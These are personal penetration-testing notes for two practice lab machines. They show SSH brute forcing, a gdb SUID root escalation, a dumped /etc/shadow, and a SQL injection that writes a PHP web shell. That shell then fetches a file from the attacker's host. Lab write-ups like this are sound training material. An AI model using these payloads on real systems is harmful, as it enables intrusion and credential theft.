GitBook: [#2] Added set-1

pg-boxes/gaara/1-recon.md

@@ -0,0 +1,14 @@
+# 1 recon
+
+```
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
+| ssh-hostkey:
+|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
+|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
+|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
+80/tcp open  http    Apache httpd 2.4.38 ((Debian))
+|_http-server-header: Apache/2.4.38 (Debian)
+|_http-title: Gaara
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+```

pg-boxes/gaara/2-80.md

@@ -0,0 +1,39 @@
+# 2 :80
+
+```
+http://192.168.71.142/
+Image of Gaara
+
+# (after ages of running) gobuster found > 
+http://192.168.71.142/Cryoserver
+[at end of page]
+/Temari
+/KazekageFrom Base64
+/iamGaara
+
+# too CTF style
+
+$ diff Temari Kazekage
+
+$ diff Temari iamGaara
+# shows text that has changed, looking into we find 
+f1MgN9mTf9SNbzRygcU
+
+Using CyberChef,
+From Base58 > gaara:ismyname
+
+# tried ssh didn't work
+# cewl > pass > hydra ssh - FAIL
+# time to brute force
+
+$ hydra -L users -P /usr/share/wordlists/rockyou.txt ssh://192.168.71.142                                                                                                                                                             130 ⨯
+
+[22][ssh] host: 192.168.71.142   login: gaara   password: iloveyou2
+1 of 1 target successfully completed, 1 valid password found
+
+$ ssh gaara@192.168.71.142                                                                                                                                                                                                            255 ⨯
+
+gaara@Gaara:~$ whoami;id
+gaara
+uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)
+```

pg-boxes/gaara/3-gaara-greater-than-root.md

@@ -0,0 +1,34 @@
+# 3 gaara > root
+
+```
+gaara@Gaara:~$ cat /etc/passwd | grep sh
+root:x:0:0:root:/root:/bin/bash
+gaara:x:1001:1001:,,,:/home/gaara:/bin/bash
+```
+
+## SiudEnum
+
+```
+[~] Custom SUID Binaries (Interesting Stuff)
+------------------------------
+/usr/bin/gdb
+/usr/bin/gimp-2.10
+------------------------------
+
+[#] SUID Binaries in GTFO bins list (Hell Yeah!)
+------------------------------
+/usr/bin/gdb -~> https://gtfobins.github.io/gtfobins/gdb/#suid
+------------------------------
+
+[$] Please try the command(s) below to exploit harmless SUID bin(s) found !!!
+------------------------------
+[~] /usr/bin/gdb -q -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
+------------------------------
+```
+
+```
+gaara@Gaara:~$ /usr/bin/gdb -q -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
+# whoami;id
+root
+uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)
+```

pg-boxes/gaara/4-post-enum.md

@@ -0,0 +1,7 @@
+# 4 post enum
+
+```
+# cat /etc/shadow
+root:$6$NTf1Txdo3NThbDCr$gj3Da028gHBqeM1r6vj7xnv4MpMlsmhGhBnFNNBQDcoY6xI6QZNZv7Y.a5GKPF4pLQDBsfl03T/4PPOalrakT0:18716:0:99999:7:::
+gaara:$6$TdB6SNcOMOw4s8pH$NdTDTvJaFjigSGFFdWw1I6eAB8PXoGsBKoiz2P60bAmYkpVytaL1KuPiBN30KBJtUXcfuQTNTnDzZ6ra/TEPe0:18744:0:99999:7:::
+```

pg-boxes/gaara/README.md

@@ -0,0 +1,2 @@
+# GAARA
+

pg-boxes/hawat/1-recon.md

@@ -0,0 +1,30 @@
+# 1 recon
+
+```
+22/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)
+| ssh-hostkey:
+|   3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
+|   256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
+|_  256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
+17445/tcp open  unknown
+fingerprint-strings:
+|   GetRequest:
+|     HTTP/1.1 200
+|     <title>Issue Tracker</title>
+|     href="/login" class="btn btn-primary" style="float:right">Sign In</a>
+|     href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
+30455/tcp open  http    nginx 1.18.0
+|_http-server-header: nginx/1.18.0
+|_http-title: W3.CSS
+| http-enum:
+|_  /phpinfo.php: Possible information file
+50080/tcp open  http    Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
+| http-methods:
+|_  Potentially risky methods: TRACE
+|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
+|_http-title: W3.CSS Template
+| http-enum:
+|   /4/: Potentially interesting folder w/ directory listing
+|   /icons/: Potentially interesting folder w/ directory listing
+|_  /images/: Potentially interesting folder w/ directory listing
+```

pg-boxes/hawat/2-17445-issue-tracker.md

@@ -0,0 +1,16 @@
+# 2 :17445 issue tracker
+
+```
+http://192.168.136.147:17445/
+Issue tracker login page
+
+http://192.168.136.147:17445/register
+Register Page
+# registered as kashz:kashz
+
+http://192.168.136.147:17445/login
+# default admin:admin not working
+
+# can login using kashz:kashz
+# can CRUD issues 
+```

pg-boxes/hawat/3-30455-w3.css.md

@@ -0,0 +1,26 @@
+# 3 :30455 w3.css
+
+```
+http://192.168.136.147:30455/
+w3.css template
+
+| http-enum:
+|_  /phpinfo.php: Possible information file
+
+http://192.168.136.147:30455/phpinfo.php
+System 	Linux hawat 5.10.14-arch1-1 #1 SMP PREEMPT Sun, 07 Feb 2021 22:42:17 +0000 x86_64
+PHP Version 	7.4.15
+$_SERVER['DOCUMENT_ROOT']	/srv/http
+
+$ gobuster dir -u http://192.168.136.147:30455/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
+===============================================================
+/4                    (Status: 301) [Size: 169] [--> http://192.168.136.147:30455/4/]
+/index.php            (Status: 200) [Size: 3356]
+
+http://192.168.136.147:30455/index.php
+# source shows >
+<!-- Test adds with URL/?title=test -->
+
+http://192.168.136.147:30455/index.php?title=kashz
+# change title of items
+```

pg-boxes/hawat/4-50080-nextcloud.md

@@ -0,0 +1,54 @@
+# 4 :50080 nextcloud
+
+```
+http://192.168.136.147:50080/
+Pizza Site | landing Page
+
+| http-enum:
+|   /4/: Potentially interesting folder w/ directory listing
+|   /icons/: Potentially interesting folder w/ directory listing
+|_  /images/: Potentially interesting folder w/ directory listing
+
+http://192.168.136.147:50080/4/
+# file w3.css
+# just css data
+
+$ gobuster dir -u http://192.168.136.147:50080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
+===============================================================
+/images               (Status: 301) [Size: 244] [--> http://192.168.136.147:50080/images/]
+/4                    (Status: 301) [Size: 239] [--> http://192.168.136.147:50080/4/]
+/index.html           (Status: 200) [Size: 9088]
+/cloud                (Status: 301) [Size: 243] [--> http://192.168.136.147:50080/cloud/]
+
+192.168.136.147:50080/cloud > http://192.168.136.147:50080/cloud/index.php/login
+Nextcloud Login Page
+
+# default creds admin:admin work
+http://192.168.136.147:50080/cloud/index.php/apps/dashboard/
+
+# language is not english
+# fix: icon-click on top, Settings > Language > English > Save
+
+# enumerating Nextcloud
+http://192.168.136.147:50080/cloud/index.php/settings/user
+# Under Settings > (left) Administration >
+
+# version check
+Overview 
+http://192.168.136.147:50080/cloud/index.php/settings/admin/overview
+Nextcloud 20.0.7
+
+# System information
+Support > Generate System Report
+Operating system: Linux 5.10.14-arch1-1 #1 SMP PREEMPT Sun, 07 Feb 2021 22:42:17 +0000 x86_64
+Webserver: Apache/2.4.46 (Unix) PHP/7.4.15 (apache2handler)
+Database: mysql 10.5.8
+PHP version: 7.4.1
+Nextcloud version: 20.0.7 - 20.0.7.1
+Configuration (config/config.php)
+
+# looking at FileManager (top)
+http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/
+# shows all files
+(bottom-left) > Settings > WebDAV link
+```

pg-boxes/hawat/5-50080-davtest.md

@@ -0,0 +1,42 @@
+# 5 :50080 davtest
+
+```
+$ davtest -url http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/ -cleanup -auth admin:admin
+********************************************************
+ Testing DAV connection
+OPEN            SUCCEED:                http://192.168.136.147:50080/cloud/remote.php/dav/files/admin
+********************************************************
+NOTE    Random string for this session: msgaP4b
+********************************************************
+ Creating directory
+MKCOL           SUCCEED:                Created http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b
+********************************************************
+ Sending test files
+PUT     jhtml   SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.jhtml
+PUT     pl      SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.pl
+PUT     cgi     SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.cgi
+PUT     shtml   SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.shtml
+PUT     html    SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.html
+PUT     jsp     SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.jsp
+PUT     aspx    SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.aspx
+PUT     txt     SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.txt
+PUT     php     SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.php
+PUT     cfm     SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.cfm
+PUT     asp     SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.asp
+********************************************************
+ Checking for test file execution
+EXEC    jhtml   FAIL
+EXEC    pl      FAIL
+EXEC    cgi     FAIL
+EXEC    shtml   FAIL
+EXEC    html    SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.html
+EXEC    jsp     FAIL
+EXEC    aspx    FAIL
+EXEC    txt     SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b/davtest_msgaP4b.txt
+EXEC    php     FAIL
+EXEC    cfm     FAIL
+EXEC    asp     FAIL
+********************************************************
+ Cleaning up
+DELETE          SUCCEED:        http://192.168.136.147:50080/cloud/remote.php/dav/files/admin/DavTestDir_msgaP4b
+```

pg-boxes/hawat/6-50080-nextcloud-enum.md

@@ -0,0 +1,107 @@
+# 6 :50080 nextcloud enum
+
+```
+# found a file called issuetracker.zip
+
+# interesting file at 
+$ cat issuetracker/src/main/resources/application.properties
+spring.datasource.url=jdbc:mysql://localhost:3306/issue_tracker?serverTimeZone=UTC
+spring.datasource.username=issue_user
+spring.datasource.password=ManagementInsideOld797
+spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
+
+spring.jpa.hibernate.ddl-auto=update
+server.port=17445
+
+# can't do anything with these creds
+# exploring the code to understand any vulnerable function
+# function stands out
+
+@GetMapping("/issue/checkByPriority")
+	public String checkByPriority(@RequestParam("priority") String priority, Model model) {
+		// 
+		// Custom code, need to integrate to the JPA
+		//
+	    Properties connectionProps = new Properties();
+	    connectionProps.put("user", "issue_user");
+	    connectionProps.put("password", "ManagementInsideOld797");
+        try {
+			conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);
+		    String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
+            System.out.println(query);
+		    Statement stmt = conn.createStatement();
+		    stmt.executeQuery(query);
+
+        } catch (SQLException e1) {
+			// TODO Auto-generated catch block
+			e1.printStackTrace();
+		}
+		
+        // TODO: Return the list of the issues with the correct priority
+		List<Issue> issues = service.GetAll();
+		model.addAttribute("issuesList", issues);
+		return "issue_index";
+        
+	}
+
+# this looks interesting 
+# all functions are small but this `/issue/checkByPriority` has custom code
+
+@GetMapping("/issue/checkByPriority")
+	public String checkByPriority(@RequestParam("priority") String priority, Model model) {
+[truncated]
+	
+String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
+Statement stmt = conn.createStatement();
+System.out.println(query);
+stmt.executeQuery(query);
+
+# Logging in > fresh session > capture request and modify to >
+GET /issue/checkByPriority?priority=Normal HTTP/1.1
+Host: 192.168.136.147:17445
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: http://192.168.136.147:17445/
+Cookie: JSESSIONID=9F60BBD237C0438959D5C4B5C576D10D
+
+# reponse
+There was an unexpected error (type=Method Not Allowed, status=405).
+
+# maybe POST?
+POST /issue/checkByPriority?priority=Normal HTTP/1.1
+Host: 192.168.136.147:17445
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: http://192.168.136.147:17445/
+Cookie: JSESSIONID=9F60BBD237C0438959D5C4B5C576D10D
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+
+
+# response
+page loads successfully
+Normal' UNION SELECT "<?php echo system($_GET['cmd']);" INTO OUTFILE '/srv/http/kashz.php'; -- 
+
+Using https://www.url-encode-decode.com/
+Normal%27+UNION+SELECT+%22%3C%3Fphp+echo+system%28%24_GET%5B%27cmd%27%5D%29%3B%22+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fkashz.php%27%3B+--+
+
+# send payload
+POST /issue/checkByPriority?priority=Normal%27+UNION+SELECT+%22%3C%3Fphp+echo+system%28%24_GET%5B%27cmd%27%5D%29%3B%22+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fb.php%27%3B+--+ HTTP/1.1
+Host: 192.168.136.147:17445
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: http://192.168.136.147:17445/
+Cookie: JSESSIONID=9F60BBD237C0438959D5C4B5C576D10D
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+# response
+HTTP/1.1 200 
+
+http://192.168.136.147:30455/kashz.php?cmd=whoami;id
+root
+uid=0(root) gid=0(root) groups=0(root) uid=0(root) gid=0(root) groups=0(root)
+
+# web shell
+http://192.168.136.147:30455/kashz.php?cmd=wget%20192.168.49.136:50080/web.php
+```